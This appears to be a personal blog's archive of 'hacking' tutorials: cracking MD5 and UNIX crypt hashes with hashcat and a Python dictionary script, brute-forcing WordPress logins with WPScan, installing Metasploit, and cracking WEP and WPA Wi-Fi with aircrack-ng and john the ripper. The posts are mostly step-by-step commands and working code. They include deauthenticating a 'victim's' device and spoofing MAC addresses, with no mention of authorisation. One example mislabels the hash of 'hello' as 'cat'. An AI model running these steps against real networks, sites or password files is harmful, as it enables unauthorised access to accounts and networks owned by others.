Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Sunday, 6 September 2015

How to crack MD5 hashes with hashcat

OS: Ubuntu 15.04

There is also a GPU version (oclhashcat), but I am on my notebook so I have to use the CPU only version, which - of course - is much slower.

Download the latest hashcat version here: https://hashcat.net/hashcat/

Download a wordlist: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

Create a MD5 hash: E.g.: 'hello'

echo -n "hello" | md5sum
5d41402abc4b2a76b9719d911017c592

Next, extract the hashcat archive and create a .txt file with the md5 hash(es) within the folder. Also, save the wordlist in the hashcat folder.

Start hashcat. Dictionary based attack.


Command:

./hashcat-cli64.bin -n 2 -m 0 -a 8  test.txt realhuman_phill.txt

-n,   --threads=NUM                 Number of threads
-m,  --hash-type=NUM              Hash-type
-a,  --attack-mode=NUM          Attack-mode

--> use ./hashcat-cli64.bin -h to display all available options.

test.txt is the file with the md5 hash(es) and realhuman_phill.txt is the wordlist.

Wait...


hashcat will create a filed named hashcat.pot which contains successfully cracked hashes. You can display its contents with cat:

user@user:~/Desktop/hashcat-0.50$ cat '/home/user/Desktop/hashcat-0.50/hashcat.pot'
5d41402abc4b2a76b9719d911017c592:hello

There you go: hello. 

Brute-force


If you want to read about brute-force (masked) attack have a look here: http://www.unix-ninja.com/p/Exploiting_masks_in_Hashcat_for_fun_and_profit/

Quick example of a brute-force attack for the md5 hash 'cat': 5d41402abc4b2a76b9719d911017c592


./hashcat-cli64.bin -n 2 -m 0 -a 3 test.txt ?a?a?a

?a?a?a specifies to go through all character combinations exactly 3 characters long. ?l?l?l would be lower-case only:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a = ?l?u?d?s

Tuesday, 25 February 2014

WPScan Tutorial (Debian, Ubuntu etc..)



WPScan is a tool to automatically scan Wordpress-Blogs for vulnerabilities. Furthermore it can enumerate user names and carry out bruteforce attacks on accounts associated with the blog.

Link: http://wpscan.org/

Install

sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev git
git clone https://github.com/wpscanteam/wpscan.git 
cd wpscan 
sudo gem install bundler && bundle install --without test development

Enumerate vulnerable plugins and themes

  • Plugins  
ruby wpscan.rb --url http://www.wpblog.com --enumerate vp
  • Themes
ruby wpscan.rb --url http://www.wpblog.com --enumerate vt

Get usernames

ruby wpscan.rb --url http://www.wpblog.com --enumerate u

Brute-forcing accounts

Most of the time, user don't chance the default 'admin' username, so you should start here.

ruby wpscan.rb --url www.wpblog.com --wordlist YOURWORDLIST --username admin

You can get an extremely good wordlist here: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

If you have any questions, drop me a line.

Tuesday, 21 January 2014

How to hash and crack UNIX passwords in python

Crypt module

I am using the crypt module here, which is a one-way hash function based upon a modified DES algorithm. You can easily adjust the script to crack secure hash algorithms (SHA1, SHA224, SHA256, SHA384, and SHA512 (defined in FIPS 180-2) as well as RSA’s MD5 algorithm ) by using the hashlib  module.

Crypt Overview

import crypt
crypt.crypt("user", "AD")
'AD5Qg2vQhsLRw'

AD is the salt, which is a random two-character string which will be used to perturb the DES algorithm in one of 4096 ways.

The python password cracking script

import crypt
def testPass(hashpass):
    salt = hashpass[0:2]
    dictionary = open('dictionary.txt', 'r') #this is our dictionary file
    for word in dictionary.readlines():
        word = word.strip('\n')
        crypto = crypt.crypt(word,salt)
        if crypto == hashpass:
            print "[+] Password: "+word+"\n"
            return
    print "[-] Password Not Found.\n"
    return

def main():
    hashpass = open('passwords.txt', 'r') #file with hashed password
    for line in hashpass.readlines():
        if ":" in line:
            user = line.split(':')[0]
            hashpass = line.split(':')[1].strip(' ')
            print "[*] Cracking Password For: "+user
            testPass(hashpass)
if __name__ == "__main__":
    main() 
 
Save the script as cracker.py.
You also need to create a dictionary.txt and password.txt  (with the hashed passwords) file to successfully run the program.

Create a new folder and put the three files into it, afterwards simply run 
python cracker.py

You can download all of the files here: Drive

Sunday, 12 January 2014

Installing Metasploit on Debian (or Ubuntu)














sudo su  

apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev  

apt-get install git-core postgresql curl ruby1.9.3 nmap gem  
gem install wirble sqlite3 bundler  

cd /opt  
git clone https://github.com/rapid7/metasploit-framework.git  

cd metasploit-framework  
bundle install  

./msfconsole  


msfconsole tutorial: click

Wednesday, 17 October 2012

Tuesday, 11 September 2012

Brute forcing WPA/WPA2 handshake with john the ripper

Please refer to this article for a tutorial on how to obtain a handshake.

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5) 

The limitation of a dictionary attack is that unless the password is in your dictionary file, your attack won't be successful. Another way to obtain the password is to brute force it with john the ripper. In theory it is possible to crack ANY password with this method, but it might take a million years to crack a full 128 ASCII characters password with your computer.

Ok, the command:

This was on Backtrack
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)

Debian
sudo apt-get install john
/usr/sbin/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)


By default john will only try passwords with 8 characters or less. However, the minimum  pass-phrase length for WPA is 8.You need to edit the john.conf file to change the max length of the output.

"--inrecemtal:all" means that john will try all 128 ASCII characters, which will  take thousand of years to complete if the password has a proper lenght. You can also try -i:digits for numbers only or -i:alpha for a to z.

Good luck.

P.S.: You might be interested in this simple Linux dictionary password cracker written in python:  Article

Tuesday, 14 August 2012

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I' ll get back to you.

Requirements
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode. It wont work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H . It is cheap, reliable and works out of the box.

Commands
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger -m 00:11:22:33:44:55 wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0 
  6. ifconfig mon0 down
  7. macchanger -r (random mac) mon0
  8. ifconfig mon0 up
  9. airodump-ng mon0 (scan for APs)
  10. Wait for a minute
  11. CTRL + C (stop scanning)
  12. Pick your own AP with WEP encryption
  13. airodump-ng -c (channel) -w (filename) —bssid (xx:xx:xx:xx:xx:xx) mon0
    • -w file, in which the data will be saved.
  14. —You need around 10k of data to successfully crack WEP—
  15. Open another console
  16. aireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0
  17. Wait for ”Association succcessful”
  18. aireplay-ng -3 -b (BSSID) -e (ESSID) mon0 (starts the injection)
    • data in the other console should now  increase significantly
  19. open another console
  20. aircrack-ng (filename.cap) 
    •  path to the file from step 13. e.g. ~/Desktop/test.cap
  21. Wait for —Key Found—
  22. Enter Key without ‘:’.
This can be done in approx. 10 minutes. Have fun!

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5)

What you need

  • Backtrack (or Linux with aircrack-ng installed)
  • Virtual machine (e.g. Vmware or Virtualbox)
  • Password list
  • USB Wifi adapter capable of promiscuous mode: Alfa AWUS036H



Alright, fire up the terminal.

Commands

  1. airmon-ng
  2. airmon-ng start wlan0
  3. ifconfig mon0 down
  4. macchanger -m 00:11:22:33:44:55 mon0
  5. ifconfig mon0 up
  6. airodump-ng mon0 (let it scan for a minute)
  7. CTRL + C (stop)
  8. airodump-ng -c (channel) -w (filename. eg. wpa) —bssid (xx:xx:xx:xx:xx:xx) mon0

 Now, we need to deauthenticate a user's pc currently on the network (mac)

  1. open another console
  2. aireplay-ng --deauth 1 (just one!) -e (ESSID) -c  (victim's mac) mon0
  3. Wait for WPA handshake ==> airodump-ng
  4. —-all cracking can be done offline—-
  5. aircrack-ng -w (wordlist) file (eg. WPA-01.cap)
    • this is the file from step 8
Note: Success of attack depends on whether your word-list contains the password or not.

Video



Any problems? Ask!